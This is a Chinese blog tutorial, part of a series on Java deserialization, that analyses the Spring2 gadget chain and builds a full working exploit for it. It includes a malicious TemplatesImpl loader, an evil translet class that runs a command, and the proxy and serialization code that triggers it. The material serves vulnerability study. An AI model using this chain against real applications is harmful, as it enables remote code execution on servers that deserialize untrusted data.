JAVA反序列化深入学习(十三):Spring2

于 2025-04-06 19:47:47 发布
阅读量961 收藏 30
点赞数 30
分类专栏: 漏洞原理 JAVA反序列化 文章标签: java 网络 web安全 反序列化 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dalock/article/details/147028961
版权

让我们回到Spring

Spring2 在 Spring1 的触发链上有所变换:

  • 替换了 spring-beans 的 ObjectFactoryDelegatingInvocationHandler
  • 使用了 spring-aop 的 JdkDynamicAopProxy ,并完成了后续触发 TemplatesImpl 的流程

简而言之,换了一个chain,而kick-off和sink都没有变动

JAVA环境

java version "1.7.0_80"

Java(TM) SE Runtime Environment (build 1.7.0_80-b15)

Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode)

依赖版本

  • spring-core 依赖版本:4.1.4.RELEASE
  • spring-aop 依赖版本:4.1.4.RELEASE
  • jdk 版本:1.7

检查依赖配置

确认项目中是否正确引入了

  • spring-core
  • spring-aop

的依赖。如果使用的是 Maven,可以在 pom.xml 文件中添加以下依赖:

<!-- https://mvnrepository.com/artifact/org.springframework/spring-aop -->
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-aop</artifactId>
    <version>4.1.4.RELEASE</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.springframework/spring-core -->
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-core</artifactId>
    <version>4.1.4.RELEASE</version>
</dependency>

资源下载

前置知识

JdkDynamicAopProxy - chain

org.springframework.aop.framework.JdkDynamicAopProxy 类是 Spring AOP 框架基于 JDK 动态代理的实现,同时其还实现了

  • AopProxy 接口
  • InvocationHandler接口
  • Serializable 接口
final class JdkDynamicAopProxy implements AopProxy, InvocationHandler, Serializable {
    ...
}
invoke

我们来看一下 invoke 方法:

  1. 获取 AdvisedSupport 里的 TargetSource
  2. 调用 getTarget() 方法返回其中的对象
  3. 调用 AopUtils#invokeJoinpointUsingReflection() 方法反射调用对象的 method 方法并返回
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
    MethodInvocation invocation;
    Object oldProxy = null;
    boolean setProxyContext = false;

    TargetSource targetSource = this.advised.targetSource;
    Class<?> targetClass = null;
    Object target = null;

    try {
        ...
        // May be null. Get as late as possible to minimize the time we "own" the target,
        // in case it comes from a pool.
        target = targetSource.getTarget();
        if (target != null) {
            targetClass = target.getClass();
        }

        // Get the interception chain for this method.
        List<Object> chain = this.advised.getInterceptorsAndDynamicInterceptionAdvice(method, targetClass);

        // Check whether we have any advice. If we don't, we can fallback on direct
        // reflective invocation of the target, and avoid creating a MethodInvocation.
        if (chain.isEmpty()) {
            // We can skip creating a MethodInvocation: just invoke the target directly
            // Note that the final invoker must be an InvokerInterceptor so we know it does
            // nothing but a reflective operation on the target, and no hot swapping or fancy proxying.
            retVal = AopUtils.invokeJoinpointUsingReflection(target, method, args);
        }
        else {
            // We need to create a method invocation...
            invocation = new ReflectiveMethodInvocation(proxy, target, method, args, targetClass, chain);
            // Proceed to the joinpoint through the interceptor chain.
            retVal = invocation.proceed();
        }
        ...
    }
    return retVal;
  ...
}
AopUtils#invokeJoinpointUsingReflection

AopUtils#invokeJoinpointUsingReflection() 方法里就是简单的反射调用,核心步骤就是:

  1. ReflectionUtils.makeAccessible(method);将方法设为可用
  2. method.invoke(target, args);传参调用方法
public static Object invokeJoinpointUsingReflection(Object target, Method method, Object[] args)
        throws Throwable {

    // Use reflection to invoke the method.
    try {
        ReflectionUtils.makeAccessible(method);
        return method.invoke(target, args);
    }
    ...
}

由此可以看到 JdkDynamicAopProxy 这个 InvocationHandler 类能出色的完成 TemplatesImpl 的对象调用,可以直接配合 Spring1 中的触发调用链

攻击构造

与 Spring1 类似,如果忘记了Spring1的内容,建议先看一下之前这篇文章

JAVA反序列化深入学习(十一):Spring1

恶意代码主体

与Spring1几乎一致,不再赘述

public void Spring2() throws Exception {

    // 生成包含恶意类字节码的 TemplatesImpl 类
    TemplatesImpl tmpl = generateTemplatesImpl();

    // 使用 AnnotationInvocationHandler 动态代理
    Class<?>       c           = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> constructor = c.getDeclaredConstructors()[0];
    constructor.setAccessible(true);

    Type typeTemplateProxy = JdkDynamicAopProxy(constructor, tmpl);

    Object objects = TypeProvider(constructor, typeTemplateProxy);

    writeObjectToFile((Serializable)objects, fileName);
    readFileObject(fileName);
}

恶意TemplatesImpl构造

生成包含恶意类字节码的 TemplatesImpl 类,跟之前的都类似,不再赘述

protected TemplatesImpl generateTemplatesImpl()  throws IOException, NoSuchFieldException, IllegalAccessException {
    // 读取恶意类存到 bytes[] 数组中
    byte[] bytes = Files.readAllBytes(Paths.get("D:\\EvilClassForSpring2.class"));

    // 初始化 TemplatesImpl 对象
    TemplatesImpl tmpl = new TemplatesImpl();
    Field bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
    bytecodes.setAccessible(true);
    bytecodes.set(tmpl, new byte[][]{bytes});

    // _name 不能为空
    Field name = TemplatesImpl.class.getDeclaredField("_name");
    name.setAccessible(true);
    name.set(tmpl, "neolock");

    return tmpl;
}

恶意类构造

跟之前的都类似,不再赘述

import java.io.IOException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import com.sun.org.apache.xalan.internal.xsltc.DOM;

public class EvilClassForSpring2 extends AbstractTranslet {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
        // No implementation needed
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) {
        // No implementation needed
    }
}

JdkDynamicAopProxy

与Spring1的ObjectFactoryDelegatingInvocationHandler类似,简单描述一下过程:

  1. 实例化 AdvisedSupport
  2. TargetSource 设置为 tmpl,使getTarget方法返回 TemplatesImpl
  3. JdkDynamicAopProxy 的 invoke 方法触发 TargetSourcegetTarget,并且会调用 method.invoke(getTarget的返回值,args)
    1. 此时返回值被在第2步我们使用动态代理改为了 TemplatesImpl
    2. 接下来需要 method 是 newTransformer(),就可以触发调用链了
  4. 使用动态代理出的 AdvisedSupport 类实例化 JdkDynamicAopProxy
    1. JdkDynamicAopProxy 本身就是个 InvocationHandler
      1. 使用它来代理一个类,这样在这个类调用时将会触发 JdkDynamicAopProxy 的 invoke 方法
    2. JdkDynamicAopProxy代理一个既是 Type 类型又是 Templates(TemplatesImpl 父类) 类型的类
      1. 代理类同时拥有两个类的方法
      2. 既能被强转为 TypeProvider.getType() 的返回值,又可以在其中找到 newTransformer 方法
protected Type JdkDynamicAopProxy(Constructor<?> constructor, TemplatesImpl tmpl) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException {

    // 实例化 AdvisedSupport
    AdvisedSupport as = new AdvisedSupport();
    as.setTarget(tmpl);

    // JdkDynamicAopProxy 的 invoke 方法触发 TargetSource 的 getTarget 返回 tmpl,并且会调用 method.invoke(返回值,args)
    // 此时返回值被我们使用动态代理改为了 TemplatesImpl,接下来需要 method 是 newTransformer(),就可以触发调用链了
    Class<?>       clazz          = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
    Constructor<?> aopConstructor = clazz.getDeclaredConstructors()[0];
    aopConstructor.setAccessible(true);

    // 使用动态代理出的 AdvisedSupport 类实例化 JdkDynamicAopProxy
    InvocationHandler aopProxy = (InvocationHandler) aopConstructor.newInstance(as);

    // JdkDynamicAopProxy 本身就是个 InvocationHandler
    // 使用它来代理一个类,这样在这个类调用时将会触发 JdkDynamicAopProxy 的 invoke 方法
    // 我们用它代理一个既是 Type 类型又是 Templates(TemplatesImpl 父类) 类型的类
    // 这样这个代理类同时拥有两个类的方法,既能被强转为 TypeProvider.getType() 的返回值,又可以在其中找到 newTransformer 方法
    Type typeTemplateProxy = (Type) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),
            new Class[]{Type.class, Templates.class}, aopProxy);
    return typeTemplateProxy;
}
与Spring1的差异

在Spring1,通过 AnnotationInvocationHandler 来将 getObject 的返回值设置为 TemplatesImpl

Map<String, Object> map = new HashMap<String, Object>();
    map.put("getObject", tmpl);

// 使用动态代理初始化 AnnotationInvocationHandler
InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class, map);

// 使用 AnnotationInvocationHandler 动态代理 ObjectFactory 的 getObject 方法,使其返回 TemplatesImpl
ObjectFactory<?> factory = (ObjectFactory<?>) Proxy.newProxyInstance(
        ClassLoader.getSystemClassLoader(), new Class[]{ObjectFactory.class}, invocationHandler);

而Spring2则是通过实例化AdvisedSupport,并直接将其TargetSource 设置为 tmpl,从而实现将 getTarget 的返回值设置为 TemplatesImpl

// 实例化 AdvisedSupport
AdvisedSupport as = new AdvisedSupport();
as.setTarget(tmpl);

而其他部分的代码都类似,可见这里就是核心差异点

TypeProvider

与Spring1一致,没有变动,不再赘述

protected Object TypeProvider(Constructor<?> constructor, Type typeTemplateProxy) throws InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, NoSuchMethodException, NoSuchFieldException {
    // 接下来代理  TypeProvider 的 getType() 方法,使其返回我们创建的 typeTemplateProxy 代理类
    HashMap<String, Object> map = new HashMap<>();
    map.put("getType", typeTemplateProxy);

    InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class, map);

    Class<?> typeProviderClass = Class.forName("org.springframework.core.SerializableTypeWrapper$TypeProvider");
    // 使用 AnnotationInvocationHandler 动态代理 TypeProvider 的 getType 方法,使其返回 typeTemplateProxy
    Object typeProviderProxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),
            new Class[]{typeProviderClass}, invocationHandler);


    // 初始化 MethodInvokeTypeProvider
    Class<?>       clazz = Class.forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
    Constructor<?> cons   = clazz.getDeclaredConstructors()[0];
    cons.setAccessible(true);

    // 由于 MethodInvokeTypeProvider 初始化时会立即调用  ReflectionUtils.invokeMethod(method, provider.getType())
    // 所以初始化时我们随便给个 Method,methodName 我们使用反射写进去
    Object objects = cons.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
    Field  field   = clazz.getDeclaredField("methodName");
    field.setAccessible(true);
    field.set(objects, "newTransformer");

    return objects;
}

总结

以上就是 Spring2 链分析的全部内容了,如果理解了 Spring1,那看 Spring2 就很简单了,最后总结一下

利用说明

使用 JdkDynamicAopProxy 替换 ObjectFactoryDelegatingInvocationHandler,并完成最终的调用链

Gadget 总结

  • kick-off gadget:org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider#readObject
  • sink gadget:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#newTransformer
  • chain gadget:org.springframework.aop.framework.JdkDynamicAopProxy#invoke

调用链展示

SerializableTypeWrapper$MethodInvokeTypeProvider.readObject()
    SerializableTypeWrapper.TypeProvider(Proxy).getType()
	    AnnotationInvocationHandler.invoke()
		    ReflectionUtils.invokeMethod()
			    Templates(Proxy).newTransformer()
				    JdkDynamicAopProxy.invoke()
					    AopUtils.invokeJoinpointUsingReflection()
						    TemplatesImpl.newTransformer()
Spring Boot进阶(46):解密Spring Boot和Jackson的完美结合:打造高效的JSON序列化方案
**My Coding Family**
06-15 1669
SpringBoot如何Jackson快速入门,一文教会你。
项目报错Java HotSpot(TM) 64-Bit Server VM warning: ignoring option MaxPermsize=256m; support was remove
m0_74186041的博客
05-24 2964
项目启动后出现如下情况 jdk1.8版本移除了-XX:MaxPermSize,使用-XX:MaxMetaspaceSize替代点击右上角运行配置,编辑配置 VM Options最右侧点击展开,将-XX:MaxPermSize改成-XX:MaxMetaspaceSize即可 重启项目,问题解决
关于Tomcat服务搭建及配置
gleamy_ming的专栏
06-25 1209
环境: 操作系统: Windows 7 SP1 JDK:Java version “1.7.0_80” Java(TM) SE Runtime Environment (build 1.7.0_80-b15) Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode) Tomcat:apa
linux的java环境配置_Linux下Java环境变量配置
weixin_39671964的博客
02-23 175
安装说明安装环境:CentOS-6.5安装方式:rpm安装软件:jdk-7u80-linux-x64.rpm安装位置:/usr/java检测系统Java版本# java -versionjava version "1.6.0_24"OpenJDK Runtime Environment (IcedTea6 1.11.1) (rhel-1.45.1.11.1.el6-x86_64)OpenJDK 6...
linux 指定java版本_Linux安装多个jdk版本进行切换
weixin_36469726的博客
02-13 937
本文为大家分享了Linux jdk安装多个版本切换的具体方法,供大家参考,具体内容如下1. 上传jdk7 和 jdk8 包2. 解压[root@localhost webapps]# tar -zxvf /package/jdk-7u80-linux-x64.tar.gz3. 配置jdk变量vi /etc/profileexport JAVA_HOME=/package/jdk1.7.0_80ex...
brew java 切换_MacOS 下切换默认 Java (JDK)
weixin_39687990的博客
12-21 455
TLDR如果同时安装了 adoptopenjdk 11 和 adoptopenjdk 8,同时希望 8 做为默认 JDK,只需要把 /Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Info.plist里的JVMVersion的值由1.8.0_222改为 x1.8.0_222(大概第42)。这样我们的MacOS默认JDK就...
kafka-stream-money-deserialization:一个用于研究Spring Kafka Streams的序列化反序列化问题的演示项目
04-02
项目"Kafka-Stream-Money-Deserialization"提供了一个深入研究和实践这些概念的平台,帮助开发者更好地理解和解决实际工作中遇到的序列化和反序列化问题,特别是在处理敏感的货币数据时。通过分析和学习该项目,我们...
spring-remote-service-example:一个示例项目,用于展示如何使用 JSON 反序列化通过 HTTP 在隔离的 Spring 容器之间进行(远程)服务调用
06-24
通过对源代码的深入学习,你可以掌握如何配置Spring MVC,如何定义RESTful API,以及如何利用Jackson进行JSON序列化和反序列化。此外,你还可以了解到如何在Spring环境中设置和使用AOP,以及如何设计和实现远程服务...
咱们继续学Java——高级篇 第二十三篇:之对象序列化深入理解
最新发布
wj_rdk的博客
01-08 1520
Java编程的学习道路上,我们始终携手共进,不断深入探索知识的海洋。此前我们学习了ZIP文档的操作以及对象序列化的基本概念和简单用法,今天我们将进一步深入对象序列化的世界,详细剖析其内部机制,包括对象共享时的处理方式、序列化算法以及在实际应用中的重要性,这将帮助我们更好地掌握对象序列化技术,为开发更复杂的Java应用程序打下坚实的基础。
SpringiA4_SourceCode:Spring实战第四版源码,学习用。
01-19
Spring实战第四版》是Java开发领域中一本深入讲解Spring框架的经典著作,源代码的提供为读者提供了亲自动手实践的机会,有助于加深理解和应用。在这个压缩包中,包含的文件名为"spring4源码_Code4",我们可以推测...
JVM执行分析
wanghaoxin的博客
06-09 829
jvm详解概述 对于java程序而言,现在应用的范围越来越广泛,那么对于从业者就不再只是单单能够实现项目需求就够了,除了这些之外,还需要对程序的调优具有一定的能力。 类加载器(ClassLoader),用户可以实现自定义的类加载器的处理操作,那么对于类加载器本身就属于JVM的重要组成范畴。 java程序的执行流程: 每当使用了类加载器进行类加载之后实际上都表示启动了一个JVM的进程,那...
java jvm 内存模型_JVM(一)Java内存模型
weixin_30878051的博客
02-24 476
前言对于从事C、C++程序开发的开发人员来说,在开始使用对象之前,他们都需要使用new关键字为对象申请内存空间,在使用完对象之后,也需要使用delete关键字来释放对象占用的内存空间。对于Java程序员来说,在虚拟机自动内存管理机制的帮助下,不再需要为每一个new操作是写匹配的delete/free代码,不容易出现内存泄漏和内存溢出的问题。不过,也正因为Java程序员吧内存控制的权力交给了Java...
linux java-version显示Java HotSpot(TM) 64-Bit Server VM (build 25.261-b12, mixed mode
weixin_43988583的博客
08-15 4920
赋予文件夹及文件权限 之后 source etc/proflie
hotspot 虚拟机的server和client模式
蜗牛学习笔记
11-29 9128
hotspot包括server和client两种模式的实现: Java HotSpot Client VM(-client),为在客户端环境中减少启动时间而优化; Java HotSpot Server VM(-server),为在服务器环境中最大化程序执行速度而设计。 比较:Server VM启动比Client VM慢,运行比Client VM快。 server模式的运行中,垃圾回收处理做的比较好一些。
Mac下同时安装多个版本的JDK
lognic10的专栏
11-03 799
DK8 GA之后,小伙伴们喜大普奔,纷纷跃跃欲试,想体验一下Java8的Lambda等新特性,可是目前Java企业级应用的主打版本还是JDK6, JDK7。因此,我需要在我的电脑上同时有JDK8,JDK7,JDK6。JDK6和JDK7主要是做一些产品代码的验证,以及自己玩一些开源项目,JDK8则纯属尝鲜,谁叫咱是喜新厌旧的程序员呢。   目标  在命令行下,可以通过命令'jdk6', 'jdk
Java HotSpot(TM) 64-Bit Server VM warning: ignoring option MaxPermSize=256m问题的解决
热门推荐
shenxiaomo1688的博客
07-12 8万+
tomcat关闭时,提示以下警告信息: Java HotSpot(TM) 64-Bit Server VM warning: ignoring option MaxPermSize=256m; support was removed in 8.0 原因:tomcat使用的jdk版本为1.8,而在tomcat/bin/catalina.sh文件中,设置的vm参数:-Xmx2048m -XX...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Neolock

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值